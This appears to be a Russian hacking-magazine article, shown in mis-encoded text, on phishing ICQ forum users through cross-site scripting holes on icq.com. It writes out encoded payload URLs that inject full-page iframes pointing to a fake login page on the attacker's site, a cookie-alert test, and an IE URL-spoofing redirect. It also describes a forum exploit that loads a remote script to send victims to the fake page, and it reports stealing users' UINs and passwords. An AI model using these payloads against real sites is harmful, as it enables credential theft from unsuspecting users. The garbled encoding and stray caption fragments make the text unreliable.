Скачать - Xakep Online

[XÀÊÅÐ 11 [83] 05 > ÂÇËÎÌ 062]
Çàáûë ñêàçàòü, ÷òî ïðè ïîñòå ñîîáùåíèÿ,
ðÿäîì ñî ñâîåé àâàòàðêîé, ìû èìååì
2 ññûëêè, îäíà èç êîòîðûõ âåäåò â
ïðîôàéë, óêàçàííûé â ñàìîì íà÷àëå
ñòàòüè, à äðóãàÿ — â ïðîôàéë, íàõîäÿùèéñÿ
ïðèìåðíî ïî ñëåäóþùåìó àäðåñó:
www.icq.com/whitepages/about_me.phpui
n=559822. Ñàìî ñîáîé, ýòîò ïðîôàéë òîæå
äûðÿâûé :).
[èäåÿ è äàëüíåéøèå èññëåäîâàíèÿ]
Èäåÿ ìîÿ âûãëÿäåëà òàê: â ôîðóì
êèäàåì ñîîáùåíèå ñî ñêðèïòîì, ðåäèðåêòÿùèì
ïîëüçîâàòåëÿ ïîïàâøåãî ïîä âîçäåéñòâèå
ýòîé CSS íà ñòðàíèöó ñ ôåéêîì,
ðàñïîëîæåííûì íà ìîåì ñàéòå, êîòîðûé
âûãëÿäèò, êàê ãëàâíàÿ ñòðàíèöà àâòîðèçàöèè
íà ôîðóìå. Ïîëüçîâàòåëü ââîäèò
ñâîè äàííûå è ïåðåõîäèò îïÿòü íà ôîðóì,
òåì âðåìåíåì âñå ââåäåííûå èì äàííûå
ñîõðàíÿþòñÿ ó ìåíÿ. Íî îäíî äåëî ñêàçàòü….
Âåäü ïîëüçîâàòåëü ñðàçó ñïàëèò
ïîääåëêó, åñëè â àäðåñíîé ñòðîêå áðàóçåðà
áóäåò íàïèñàíî ÷òî-òî òèïà: http//panterka-zloy
hacker.h15.ru/razvod.php. Òóò
ìîæíî áûëî ïîéòè 2-ìÿ ïóòÿìè: èëè èñïîëüçîâàòü
äëÿ îáìàíà url spoofing, èëè
íàéòè åùå îäíó ïàññèâíóþ óÿçâèìîñòü
(æåëàòåëüíî íà ñòðàíèöå àâòîðèçàöèè íà
ôîðóì) è âñòðîèòü â íåå iframe, ÷åðåç êîòîðûé
îòîáðàæàëñÿ áû ìîé ôåéê.
ß ñáåãàë â íî÷íîé ìàãàçèí çà äâóìÿ áóòûëî÷êàìè
ïèâêà è ïðèíÿëñÿ èñêàòü íîâûå
CSS. Ïðîøëî 15 ìèí, è óæå áûëî âûäåëåíî
3 ïàññèâíûõ óÿçâèìîñòè, îäíà èç
êîòîðûõ íàõîäèëàñü èìåííî â ñòðàíèöå
àâòîðèçàöèè. Âîò åå url ñ óæå âñòðîåííûì
îïàñíûì ñêðèïòîì:
www.icq.com/karma/login_page.phpde
st=http%3A%2F%2Fwww.icq.com%2Fb
oards%2F&sv=2&css=boards.css">
Òåïåðü, ïåðåâåäÿ îñîáî ïàëåâíûå ìîìåíòû
â uri êîäèðîâêó, ïîëó÷èì:
www.icq.com/karma/login_page.phpdes
t=http%3A%2F%2Fwww.icq.com%2Fboa
rds%2F&sv=2&css=boards.css%22%3E
%3Ciframe%2520src%3Dhttp%3A%2F%
2Fmy_site%2Flogin.php%2520height%3
D100%25%2520width%3D100%25
ðèñ. 2: ñêðèïò â óÿçâèìîì ïîëå
ðèñ.1: ýëåìåíòàðíûé îáõîä ôèëüòðà íà êîëè÷åñòâî
ââîäèìûõ ñèìâîëîâ
Êàê âèäèøü, ÿ ñîçäàë èôðåéì, â êîòîðîì
áóäåò îòîáðàæàòüñÿ íàø ôåéê, ðàñïîëîæåííûé
íà ìîåì ñàéòå, íî…íà äàííîé
ñòðàíèöå (www.icq.com/ karma
/login_page.php) îêàçàëîñü öåëûõ 3 óÿçâèìûõ
ïàðàìåòðà, à ýòî îçíà÷àåò, ÷òî
ìû áóäåì âèäåòü öåëûõ òðè 100% èôðåéìà,
îòîáðàæàþùèõñÿ ñâåðõó âíèç.
Êîíå÷íî, íå âñå ýòî çàìåòÿò, íî, íå æåëàÿ
ðèñêîâàòü, ïðèøëîñü âçÿòü äðóãóþ
óÿçâèìîñòü — â ôîðóìíîì ïîèñêîâèêå:
www.icq.com/icq_preferences/sig_preview.phpsig=alert(document.co
okie)
Òóò ìåíÿ òîæå æäàëà íåóäà÷à — îãðàíè÷åíèå
íà êîëè÷åñòâî ââîäèìûõ ñèìâîëîâ.
 èòîãå, ÿ îñòàíîâèëñÿ íà 3 CSS. Âîò åå url ñ
óæå îôîðìëåííûì iframe. Îïÿòü æå, çàøèôðîâàâ
âñå ëèøíåå è íåêðàñèâîå, ïîëó÷èì:
www.icq.com/icq_preferences/sig_preview.phpsig=%3Ciframe+src%3Dhttp%
3A%2F%2Fmy_site%2Flogin.php+heigh
t%3D100%25+width%3D100%25+scroll
ing=no+frameborder=0%3E
Âñå ïðîøëî óñïåøíî, ñêðèïò ëèøü íåìíîãî
ïàëèòñÿ â title ñòðàíèöû, íî, â ïðèíöèïå,
âñå îòëè÷íî.
Äëÿ îáùåãî ðàçâèòèÿ ÿ ðåøèë ðàññìîòðåòü
åùå îäèí âàðèàíò îáìàíà — url
spoofing. Ýòà èäåÿ óæå ðàññìàòðèâàëàñü
â æóðíàëå, à èìåííî ¹3 2004, ñòð.64,
òàê ÷òî îñîáûõ ñëîæíîñòåé ó òåáÿ âûçâàòü
íå äîëæíà. Äëÿ îñóùåñòâëåíèÿ
ïîäñòàâû, íàäî ÷òîá ó æåðòâû â áðàóçåðå
ñðàáîòàë òàêîé âîò êîä:
location.href=unescape('http://w
ww.icq.com|login.php%01@www.my_si
te/login.php');
Áðàóçåðîì äîëæåí áûòü íå îáíîâëåííûé
îñåë. Ê ñîæàëåíèþ, â ïåðâîì àäðåñå
ñêðèïòà, íåëüçÿ èñïîëüçîâàòü ñëýøè, ïîýòîìó
ïðèøëîñü äîâîëüñòâîâàòüñÿ âåðòèêàëüíîé
÷åðòîé. Õîòÿ, âîçìîæíî,
òû ïðèäóìàåøü ÷òî-íèáóäü ïîêðàñèâåå :).
[à òåïåðü î ñàìîì ôåéêå] À òóò íåò
íè÷åãî ñëîæíîãî. Ïðîñòî ñîõðàíÿåì ñòðàíèöó
àâòîðèçàöèè íà âèíò è íåìíîãî ïðàâèì,
à èìåííî — èçìåíÿåì ïàðàìåòð
ôîðìà äëÿ ïîñòèíãà ñîîáùåíèé
íà www.linuxsucks.org
action, óêàçûâàÿ âìåñòî www.icq.com/karma/login.php ñâîé
ôàéë check.php. Ñàì æå check.php áóäåò âûãëÿäåòü òàê:
[check.php]
ðèñ.3: ìîè êóêèñû âî âñåé ñâîåé êðàñîòå
Òåïåðü çàëüåì ýòè 2 ôàéëà, à òàêæå ôàéë logi.html, íà
ñàéò ñ ïîääåðæêîé php (â äàííîì ñëó÷àå ýòî ìîé ñàéò —
my_site). Âîò è âñå, ôåéê ãîòîâ! Íå çàáóäü òîëüêî âûñòàâèòü
ïðàâèëüíûé chmod.
[ñîáèðàåì âñå âîåäèíî] Òàê êàê óÿçâèìûé ïàðàìåòð
Subject/Question íå ïðèíèìàë áîëåå 55 çíàêîâ, ïðèøëîñü
ïðèáåãíóòü ê îäíîé õèòðîñòè. Â ôîðóìå ÿ ñîçäàë òåìó ñ çàãîëîâêîì
">. Ïîòîì
ñîçäàë ôàéë 1.js, â êîòîðûé ïîìåñòèë òàêóþ âîò ñòðîêó:
location.href=unescape('http://www.icq.com|login.php%0
1@www.my_site/login.php');
èëè äëÿ ðàáîòû ñ èôðåéìîì:
location.href='http://www.icq.com/icq_preferences/sig_pre
view.phpsig=%3Ciframe+src%3Dhttp%3A%2F%2Fmy_si
te%2Flogin.php+height%3D100%25+width%3D100%25+s
crolling=no+frameborder=0%3E';
Ðàçìåùåííûé íà ôîðóìå ñïëîèò ãðóçèë ñ ìîåãî ñàéòà
ñêðèïò 1.js, êîòîðûé ðåäèðåêòèë âñåõ, êòî íàõîäèëñÿ íà
äàííîé ñòðàíèöå ôîðóìà, íà ìîé ôåéê. Ïîëüçîâàòåëüæåðòâà,
äóìàë, ÷òî ýòî ãëþê ôîðóìà è çàíîâî àâòîðèçèðîâàëñÿ,
òåì ñàìûì, îñòàâëÿÿ ìíå ñâîè óèíû/ïðèìàðè
è ïàðîëè, è ïîñëå ïîïàäàë îáðàòíî íà äîñêó êàê íè
â ÷åì íå áûâàëî.
Âîò è âñå. Òåïåðü çàäà÷à ñòîèò íàä òåì, êàê óäåðæàòü óêðàäåííûå
óèíû ó ñåáÿ, íî çíàÿ óèí/ïðèìàðè è ïàðîëü, ýòî
óæå íå ïðîáëåìà :).
[ñàìûé äûðÿâûé ñàéò ãîäà :)] Ïîêà ïèñàë ñòàòüþ,
â çàêðûòûõ è ïàáëèê ðàçäåëàõ àíòè÷àòà íà÷àëñÿ ãëîáàëüíûé
ïîèñê áàãîâ â icq.com, è óæå ñåé÷àñ òàì åñòü î÷åíü
èíòåðåñíûå ðàçðàáîòêè (ìíîæåñòâî ïàññèâíûõ CSS, äûðêè,
ïîçâîëÿþùèå óãíàòü àéñèêüþøíîå ìûëî, è ò.ä.).
 òî æå âðåìÿ, êîãäà ñòàòüÿ óæå áûëà äîïèñàíà, ìíîé áûëî
íàéäåíî åùå íåñêîëüêî CSS íà icq.com. Òàê ÷òî äåëàé
âûâîäû è ïðîäîëæàé èññëåäîâàíèÿ
ìîé ôåéê, îòîáðàæåííûé ÷åðåç èôðåéì
ìîé ôåéê, èñïîëüçóþùèé url-spoofing